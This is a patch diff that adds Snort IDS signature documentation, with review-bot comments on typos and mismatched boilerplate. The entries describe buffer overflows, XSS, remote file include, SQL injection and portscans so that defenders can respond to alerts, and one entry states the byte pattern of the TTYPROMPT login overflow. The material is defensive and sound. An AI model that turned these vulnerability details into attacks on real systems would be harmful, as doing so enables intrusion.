+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck634.html
+
+--
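Review bot: the sentence "+If you are running Oracle on a Windows server, make sure that the" / "+variable $ORACLE_PORTS is set to a value of "any"." is a sensor configuration instruction placed inside the vulnerability description and gives no reason for the setting; move it to Corrective Action or a rule-tuning note and state why Windows deployments need it. Attack Scenarios refers to "+An attacker can supply a long string to the "type" variable" but Detailed Information never introduces a "type" parameter for comment_on_repobject; name it there. "+vulnerability in a Oracle database implementation." should read "an Oracle", and Ease of Attack "+Simple." should be qualified by the valid-credentials requirement stated in Attack Scenarios.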
--- /dev/null
+++ b/doc/signatures/641.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 641
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing Digital UNIX network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS352
+
+--
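Review bot: this file lacks an Affected Systems section between Detailed Information and Attack Scenarios; add one naming Digital UNIX hosts, which Detailed Information already identifies as the target. "+This rule tracks the bit combination which may occur in network packets" is vague where the False Negatives text is precise ("+This event is specific to the shell code defined in the rule."); say that the rule matches a specific Digital UNIX shellcode byte sequence. "+Original Rule Writer Unkown" has the typo "Unkown" for "Unknown".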
--- /dev/null
+++ b/doc/signatures/106-3.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+106-3
+
+--
+Summary:
+This event is generated when the pre-processor spp_rpc_decode detects
+network traffic that may constitute an attack. Specifically a large rpc
+record fragment was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_rpc_decode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
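Review bot: Attack Scenarios is empty and Impact "+Unknown." contradicts Ease of Attack "+Simple."; a large RPC record fragment flagged by spp_rpc_decode should describe the fragmentation-based evasion or overflow case the preprocessor is watching for, and Impact should follow from that. "+network traffic that may consititute an attack." has the typo "consititute" for "constitute".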
--- /dev/null
+++ b/doc/signatures/122-16.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-16
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip
+filtered distributed protocol scan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
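Review bot: two typos: "+reconnaisance and may be the prelude to a targeted attack against the" should read "reconnaissance", and "+network traffic that may consititute an attack." should read "constitute". The Summary names the event as an "ip filtered distributed protocol scan" but nothing in Detailed Information explains what "filtered" and "distributed" mean for this event type; a one-line definition, or a pointer to the matching section of README.sfportscan, would help the analyst tune the preprocessor as the text suggests.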
--- /dev/null
+++ b/doc/signatures/100000783.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000783
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "ATutor" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "show_courses" parameter in the "create_course.php" script used by the "ATutor" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using ATutor
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
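Review bot: the impact mismatch repeats here. "+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application." and the "execute system binaries" sentence describe server-side compromise, while the flaw is cross site scripting in the "show_courses" parameter of create_course.php and Attack Scenarios correctly describes a malicious link aimed at a user; limit Impact to what XSS delivers in the victim's browser.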
--- /dev/null
+++ b/doc/signatures/1230.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1230
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
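Review bot: the Summary ("a known vulnerability on a web server or a web application resident on a web server") and the Detailed Information never say what request content the rule actually matches, and Additional References is empty, so a reader cannot tell what traffic triggers SID 1230 or look it up; state the matched pattern in Detailed Information and add at least one reference. In the Impact paragraph "arbitrary code of the attackers choosing" should read "attacker's choosing".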
--- /dev/null
+++ b/doc/signatures/100000862.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000862
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "FlushCMS" application running on a webserver. Access to the file "class.rich.php" using a remote file being passed as the "class_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "class_path" parameter in the "class.rich.php" script used by the "FlushCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using FlushCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
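Review bot: in the third Detailed Information paragraph "a CGI application running ona web server" should read "on a web server", and that whole paragraph (about validating the credentials of a client host) is boilerplate that does not describe the remote file include via the "class_path" parameter documented two paragraphs above it; drop it or reword it to the inclusion case. Additional References is empty even though the Summary names the exact script ("class.rich.php") and parameter, so the originating advisory should be listed. The `--` after "Affected Systems:" and after "Contributors:" also lacks the blank line used before every other delimiter in the file.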
--- /dev/null
+++ b/doc/signatures/2175.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to access a system
+file via SMB. 
+
+--
+Impact:
+Serious. This file contains important operating system information.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to access a file
+containing important operating system information using SMB across the
+network.
+
+--
+Affected Systems:
+Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If this file is accessible via SMB the attacker can manipulate the
+operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+
+--
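Review bot: the Sid recorded in the body is "2176" but the file is doc/signatures/2175.txt; one of the two is wrong and any lookup by SID will land on the wrong document, so please reconcile before merging. The Summary, Impact and Attack Scenarios all refer to "a system file" / "This file" without ever naming the file the rule watches for, so the document does not tell the reader what triggers the alert; name it in the Summary. Minor: "None Known." under False Negatives differs from the "None known." used in the other files.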
--- /dev/null
+++ b/doc/signatures/100000617.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000617
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_sponsored_listing.php" using a remote file being 
+passed as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_sponsored_listing.php" script used by the "Indexu" application running on 
+a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
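Review bot: "a CGI application running ona web server" in the third Detailed Information paragraph should read "on a web server", and that paragraph about client-host credential checks is copied boilerplate that does not describe the remote file include via "admin_template_path" the document is about; reword or remove it. Most wrapped lines in this file carry trailing whitespace (e.g. "exploit a remote file ", "running on a webserver. "), which should be stripped for consistency with the other documents. Additional References is empty although the Summary identifies the exact script and parameter; add the advisory.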
--- /dev/null
+++ b/doc/signatures/3274.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+3274
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+buffer overflow vulnerability affecting "login" via Telnet.
+
+--
+Impact:
+Serious. Unauthorized administrative access to the target host.
+
+--
+Detailed Information:
+The login binary is used when establishing an interactive session on a
+system. It is used locally and by protocols that allow remote access. A
+buffer overflow condition exists in some versions of login that can be
+triggered by the manipulation of environment variables.
+
+This event is generated when an attempt is made to overflow login via
+telnet by manipulating the TTYPROMPT environment variable.
+
+--
+Affected Systems:
+	Systems using Sys V derived login
+
+--
+Attack Scenarios:
+An attacker can overflow a buffer by inserting 6 bytes of data followed
+by 65 characters and a newline into the TTYPROMPT variable.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
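Review bot: Additional References is empty even though this document describes a specific, well-known login/TTYPROMPT overflow with a concrete trigger ("6 bytes of data followed by 65 characters and a newline"); the vendor advisories and the CVE entry for it should be listed so readers can confirm which "Sys V derived login" builds are affected. The Affected Systems line would also read better as "Systems using a System V derived login" with the vendor list from those advisories.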
--- /dev/null
+++ b/doc/signatures/917.txt
@@ -0,0 +1,62 @@
+SID:
+917
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
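Review bot: this file departs from the layout every other document in the patch uses: the "SID:" block precedes "Rule:", the delimiter lines sit before rather than after each section's blank line, and the closing section is "References:" instead of "Additional References:", which will break any tooling that keys on the common section names; bring it in line with the template. Typos: "This even indicates" should be "This event indicates", "a Allaire ColdFusion Server" should be "an Allaire ColdFusion Server", "can be accesses" should be "can be accessed", and "at type of writing" should be "at time of writing". The References section is empty even though Corrective Action says "Patches are available from Allaire"; link the Allaire advisory.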
--- /dev/null
+++ b/doc/signatures/2302.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2302
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
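Review bot: the Attack Scenarios paragraph ("An attacker can access an authentication mechanism and supply his/her own credentials to gain access.") is boilerplate that does not match the weakness Detailed Information describes, which is unchecked user input leading to PHP code execution and file inclusion in Advanced Poll 2.0.2; rewrite it around the input the rule matches. In Detailed Information "when handling user input, this may lead to" is a comma splice; split it into two sentences. Additional References is empty for a vulnerability pinned to a specific product version; add the advisory.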
--- /dev/null
+++ b/doc/signatures/2279.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2279
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
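Review bot: Detailed Information has a stray space in "the PHP application MediaWiki ." and a comma splice in "when handling user input, this may lead to"; fix both. Affected Systems pins the issue to two specific snapshot builds ("MediaWiki-stable 20031107" and "MediaWiki-stable 20030829") yet Additional References is empty, so add the MediaWiki advisory or Bugtraq entry that identifies those builds. Corrective Action ("Ensure the system is using an up to date version of the software.") drops the "vendor supplied patches" clause the other files carry; either is fine, but be consistent.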
--- /dev/null
+++ b/doc/signatures/1287.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1287
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
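Review bot: the Impact line "Information gathering possible administrator access." is missing punctuation between its two clauses (e.g. "Information gathering. Possible administrator access."). More substantively, neither the Summary nor Detailed Information says what request the rule matches; "a potential weakness on a host running Microsoft Internet Information Server (IIS)" could describe dozens of SIDs, so state the URI or content pattern. Minor: "None Known." differs from the "None known." used elsewhere, and there is an extra blank line under Additional References.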
--- /dev/null
+++ b/doc/signatures/100000531.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000531
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "BtitTracker" application running on a webserver. Access 
+to the file "torrents.php" with SQL commands being passed as the "by" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "by" parameter in the "torrents.php" script used by the 
+"BtitTracker" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BtitTracker
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
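Review bot: "a CGI application running ona web server" in the third Detailed Information paragraph should read "on a web server", and that paragraph about validating client-host credentials is copied boilerplate unrelated to the SQL injection via the "by" parameter that the document is about; remove or reword it. Since Attack Scenarios already states the root cause ("if user input is not correctly sanitized or checked before passing that input to the database"), Corrective Action should echo it rather than only the generic "up to date version" line, and the "BtitTracker" advisory should appear in Additional References alongside the generic SQL injection article.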
--- /dev/null
+++ b/doc/signatures/3075.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3075
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"unsubscribe" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
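Review bot: in Attack Scenarios "An attacker can supplied an overly long command" should read "can supply"; in the Summary "associated with the several commands of an IMAP service" should read "with several commands"; and the Contributors line "Brian Caswell<bmc@sourcefire.com>" is missing the space before the address. Affected Systems names two exact Mercury versions (3.32 and 4.01a) but Additional References is empty; add the advisory that established those versions.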
--- /dev/null
+++ b/doc/signatures/1884.txt
@@ -0,0 +1,65 @@
+Rule:
+
+
+--
+Sid: 
+
+1884
+
+-- 
+Summary: 
+This rule has been placed in deleted.rules
+
+-- 
+Impact: 
+
+attacker might have gained an ability to execute commands remotely on the system.
+
+--
+Detailed Information:
+
+This signature triggers when a UNIX "id" command is used to confirm
+the user name of the currently logged in user over any unencrypted
+connection. Such connection can be either a legitimate telnet
+connection or a result of spawning a shell on FTP, POP3, SMTP or other
+port as a consequence of network exploit. The string "uid=" and
+"(web)" is an output of an "id" command indicating that the user
+has "web" account privileges, typically used by the web server
+process.  Seeing such a response indicates that some user connected
+over the network to a target web server and likely exploited the web
+server to launch a shell.
+
+--
+Attack Scenarios: 
+
+a buffer overflow exploit against the WWW server results in "/bin/sh" being executed. An automated script performing an attack, checks for the success of the exploit via an "id" command.
+
+-- 
+Ease of Attack: 
+
+this post-attack behavior can accompany different attacks
+
+-- 
+False Positives: 
+
+the signature will trigger if a legitimate system administrator executes the "id" command over the telnet connection which uses one of the web ports, as defined in snort.conf
+
+--
+False Negatives: 
+
+not known
+
+-- 
+Corrective Action: 
+
+investigate the server for signs of compromise, run
+the integrity checking software, look for other IDS alerts involving
+the same IP addresses.
+
+--
+Contributors: Anton Chuvakin <anton@chuvakin.org>
+
+-- 
+Additional References:
+
+--
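Review bot: the "Affected Systems:" section is missing entirely from this file, and since the Summary says only "This rule has been placed in deleted.rules" the document should state why or when the rule was retired instead of documenting it as if it were live. Detailed Information says the signature fires "over any unencrypted connection" while False Positives limits it to "one of the web ports, as defined in snort.conf"; reconcile the two. Several sections begin lowercase ("attacker might have gained", "a buffer overflow exploit", "this post-attack behavior", "not known"), "Such connection can be" should read "Such a connection can be", "The string "uid=" and "(web)" is an output" should read "are output", and the delimiters mix "--" with "-- " (trailing space).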
--- /dev/null
+++ b/doc/signatures/1814.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1814
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a flaw on a 
+Cisco VoIP telephone.
